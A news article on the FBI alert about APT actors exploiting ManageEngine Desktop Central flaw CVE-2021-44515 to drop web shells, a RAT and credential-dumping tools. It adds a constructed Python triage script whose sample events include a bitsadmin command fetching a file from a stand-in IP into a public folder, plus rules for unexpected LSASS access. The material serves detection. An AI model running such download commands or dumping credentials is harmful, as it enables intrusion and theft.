The FBI’s cyber division has issued an alert warning enterprises using Zoho-owned ManageEngine’s Desktop Central that advanced attackers have been exploiting a flaw to install malware since late October.
Zoho released a patch for an authentication bypass flaw CVE-2021-44515 on December 3, warning at the time that it had seen “indications of exploitation” and urged customers to update immediately.
Zoho didn’t provide further details of the attacks at the time, which occurred after activity this year targeting previously patched flaws in ManageEngine products that are tracked as CVE-2021-40539 and CVE-2021-44077. However, the FBI says in the new alert that advanced persistent threat (APT) actors have been exploiting CVE-2021-44515 since at least October 2021.
“Since at least late October 2021, APT actors have been actively exploiting a zero-day, now identified as CVE-2021-44515, on ManageEngine Desktop Central servers,” the FBI alert said.
Microsoft has previously attributed some of the earlier activity to a Chinese hacker group that was installing web shells on compromised servers to gain persistence. The flaws affected IT management products used by end-user organizations and managed service providers.
The FBI now says it observed APT actors compromising Desktop Central servers using the flaw, now known as CVE-2021-44515, to drop a webshell that overrides a legitimate function of Desktop Central.
The attackers then downloaded post-exploitation tools, enumerated domain users and groups, conducted network reconnaissance, attempted lateral movement across the network and dumped credentials.
ManageEngine is the enterprise IT management software division of Zoho, a company well known for its software-as-a-service products.
The flaw affects Desktop Central software for both enterprise customers and the version for managed service provider (MSP) customers.
The FBI has filled in some details about how attackers are abusing the flaw after obtaining samples that were downloaded from likely compromised ManageEngine ADSelfService Plus servers.
It has seen attackers upload two variants of web shells with the filenames emsaler.zip (variant 1, late October 2021), eco-inflect.jar (variant 1, mid-November 2021) and aaa.zip (variant 2, late November 2021). The webshell overrides the legitimate Desktop Central application protocol interface servlet endpoint.
The webshell is also used for reconnaissance and domain enumeration. Eventually, the attackers install a remote access tool (RAT) for further intrusion, lateral movement and credential dumping, using the penetration testing tool Mimikatz and dumps of LSASS process memory.
The attackers also used the Windows authentication protocol WDigest to steal credentials through an LSASS dump, signaling the attackers were using so-called ‘living off the land’ legitimate tools for nefarious purposes.
Other tools in this category include Microsoft’s BITSAdmin command-line tool “to download a likely ShadowPad variant dropper with filename mscoree.dll, and a legitimate Microsoft AppLaunch binary, iop.exe”, according to the FBI.
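The artifacts the alert names (the three web shell filenames, BITSAdmin transfers landing mscoree.dll or iop.exe, and LSASS memory access) can be turned into a first-pass triage of endpoint telemetry. The script below is an added example written for this article; it is not code from the FBI, Zoho or ManageEngine. The telemetry format, the file paths, the 198.51.100.10 address and the LSASS allowlist are all constructed assumptions; only the indicator filenames come from the alert as quoted above. One caveat the rules encode: mscoree.dll is also the name of a legitimate .NET runtime shim under the Windows directory, so the check keys on how the file arrived (a BITS transfer) and where it lives, not on the name alone.

```python
"""Defender-side triage of the artifacts named in the FBI alert on
CVE-2021-44515 activity: web shell filenames, BITSAdmin downloads of
mscoree.dll / iop.exe, and LSASS memory access.
All telemetry here is constructed for illustration; the rules are
heuristics for analyst review, not signatures."""
import ntpath
import shlex

# Indicator filenames taken from the alert as described in the article.
WEBSHELL_NAMES = {"emsaler.zip", "eco-inflect.jar", "aaa.zip"}
DROPPED_NAMES = {"mscoree.dll", "iop.exe"}
# Hypothetical allowlist of processes expected to open LSASS; tune per environment.
LSASS_ALLOWED_SOURCES = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}
SYSTEM_PREFIX = "c:\\windows\\"

# Constructed sample telemetry as (event_type, detail) pairs; not real logs.
SAMPLE_EVENTS = [
    ("file_write", r"C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\emsaler.zip"),
    ("file_write", r"C:\ManageEngine\DesktopCentral_Server\logs\server.log"),
    ("process", r'"C:\Windows\System32\bitsadmin.exe" /transfer job1 http://198.51.100.10/x C:\Users\Public\mscoree.dll'),
    ("process", r"C:\Windows\System32\svchost.exe -k netsvcs"),
    # mscoree.dll is a legitimate .NET shim when it lives under the Windows directory.
    ("process", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoree.dll"),
    ("process", r"C:\Users\Public\iop.exe"),
    ("lsass_access", r"source=C:\Windows\System32\csrss.exe target=lsass.exe"),
    ("lsass_access", r"source=C:\Users\Public\iop.exe target=lsass.exe"),
]


def basename(path):
    """Lower-cased file name of a Windows path with quotes removed; ntpath keeps this portable."""
    return ntpath.basename(path.strip('"')).lower()


def under_windows_dir(path):
    return path.strip('"').lower().startswith(SYSTEM_PREFIX)


def check_file_write(path):
    if basename(path) in WEBSHELL_NAMES:
        return "webshell_filename"
    return None


def check_process(cmdline):
    # posix=False keeps backslashes literal; quotes stay on tokens and are stripped in basename().
    tokens = shlex.split(cmdline, posix=False)
    if not tokens:
        return None
    exe = basename(tokens[0])
    if exe == "bitsadmin.exe" and any(t.lower() == "/transfer" for t in tokens):
        dest = tokens[-1]
        # A BITS transfer that lands one of the named files, or any file outside
        # the Windows directory, is worth an analyst's look.
        if basename(dest) in DROPPED_NAMES or not under_windows_dir(dest):
            return "bitsadmin_download"
    if exe in DROPPED_NAMES and not under_windows_dir(tokens[0]):
        return "named_binary_outside_system_dir"
    return None


def check_lsass_access(detail):
    fields = dict(kv.split("=", 1) for kv in detail.split())
    if basename(fields.get("source", "")) not in LSASS_ALLOWED_SOURCES:
        return "unexpected_lsass_access"
    return None


CHECKS = {
    "file_write": check_file_write,
    "process": check_process,
    "lsass_access": check_lsass_access,
}


def scan(events):
    """Return a (rule, detail) pair for every event that trips a rule."""
    findings = []
    for kind, detail in events:
        check = CHECKS.get(kind)
        rule = check(detail) if check else None
        if rule:
            findings.append((rule, detail))
    return findings


if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print(f"{rule:32} {detail}")
```

Run against the constructed events, the scan flags the web shell write, the BITSAdmin transfer, iop.exe running from a user-writable path and the non-allowlisted LSASS access, while the legitimate mscoree.dll under the .NET framework directory and the csrss.exe LSASS access pass. In a real deployment the event tuples would come from an EDR or Sysmon export, and hits are leads for the host-level investigation the alert describes, not proof of compromise.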
ManageEngine has strongly advised customers to update their installations to the latest build as soon as possible.